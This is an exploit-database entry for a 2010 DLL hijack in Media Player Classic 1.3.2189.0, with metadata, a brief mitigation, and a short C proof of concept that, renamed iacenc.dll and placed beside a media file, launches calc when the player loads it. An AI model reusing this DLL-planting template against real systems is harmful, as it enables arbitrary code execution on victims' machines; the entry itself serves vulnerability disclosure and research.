Mediaplayer Classic 1.3.2189.0 Dll Hijack Exploit

vendor:

Media Player Classic

by:

Encrypt3d.M!nd

7,5

CVSS

HIGH

DLL Hijacking

284

CWE

Product Name: Media Player Classic

Affected Version From: 1.3.2189.0

Affected Version To: 1.3.2189.0

Patch Exists: NO

Related CWE: N/A

CPE: a:mplayer_classic:media_player_classic

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

Mediaplayer Classic 1.3.2189.0 Dll Hijack Exploit

Compile the following code and rename it to iacenc.dll and place file with one of the affected types in the same directory of the dll. Affected types: m2ts, m2t, flv, hdmov, 3gpp,3gp, mpeg, mp4v, mkv, m2v,rm , ram (i guess all file types that mpc supports are affected).

Mitigation:

Ensure that all DLLs are properly signed and verified before loading them into memory.

Source

Exploit-DB raw data:

/*
Mediaplayer Classic 1.3.2189.0 Dll Hijack Exploit
By: Encrypt3d.M!nd
Date: 25\8\2010
Download: http://mpc-hc.sourceforge.net/

Details:
Compile the following code and rename it to iacenc.dll
and place file with one of the affected types in the same directory of the dll

Affected types: m2ts, m2t, flv, hdmov, 3gpp,3gp, mpeg, mp4v, mkv, m2v,rm , ram
(i guess all file types that mpc supports are affected)

Code :(used the one from this advisory:http://www.exploit-db.com/exploits/14758/):
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14765.zip (mpc-poc.zip)